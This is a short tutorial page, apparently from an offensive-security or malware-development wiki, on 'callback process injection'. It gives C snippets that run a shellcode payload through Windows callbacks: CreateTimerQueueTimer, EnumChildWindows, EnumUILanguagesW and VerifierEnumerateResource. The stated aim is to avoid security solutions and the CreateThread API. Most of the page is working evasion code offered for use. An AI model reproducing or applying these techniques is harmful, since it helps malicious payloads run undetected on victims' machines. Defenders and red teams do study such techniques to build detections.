Callback Process Injection

Introduction

Callbacks in Windows are commonly used to handle specific events when they occur based on a condition. They are used in event handling, window management, and multithreading.

We can abuse callback functions to execute payloads in the local process to avoid security solutions and the use of API functions like CreateThread.

Note: This only works in the`` local process ``and cannot be done in order to achieve remote process injection.

A list of callbacks can be found in the Github Repo below

GitHub - aahmad097/AlternativeShellcodeExec: Alternative Shellcode Execution Via CallbacksGitHub

CreateTimerQueueTimer

HANDLE hTimer = NULL;

if (!CreateTimerQueueTimer(&hTimer, NULL, (WAITORTIMERCALLBACK)Payload, NULL, NULL, NULL, NULL)){
	printf("[!] CreateTimerQueueTimer Failed With Error : %d \n", GetLastError());
	return -1;
}

EnumChildWindows

	if (!EnumChildWindows(NULL, (WNDENUMPROC)Payload, NULL)) {
		printf("[!] EnumChildWindows Failed With Error : %d \n", GetLastError());
		return -1;
	}

EnumUILanguagesW

	if (!EnumUILanguagesW((UILANGUAGE_ENUMPROCW)Payload, MUI_LANGUAGE_NAME, NULL)) {
		printf("[!] EnumUILanguagesW Failed With Error : %d \n", GetLastError());
		return -1;
	}

VerifierEnumerateResource

	HMODULE hModule = NULL;
	fnVerifierEnumerateResource pVerifierEnumerateResource = NULL;

	hModule = LoadLibraryA("verifier.dll");
	if (hModule == NULL){
		printf("[!] LoadLibraryA Failed With Error : %d \n", GetLastError());
		return -1;
	}

	pVerifierEnumerateResource = GetProcAddress(hModule, "VerifierEnumerateResource");
	if (pVerifierEnumerateResource == NULL) {
		printf("[!] GetProcAddress Failed With Error : %d \n", GetLastError());
		return -1;
	}

	// Must set the AvrfResourceHeapAllocation flag to run the payload
	pVerifierEnumerateResource(GetCurrentProcess(), NULL, AvrfResourceHeapAllocation, (AVRF_RESOURCE_ENUMERATE_CALLBACK)Payload, NULL);

PreviousAPC Injection NextFunction Stomping

Last updated 8 months ago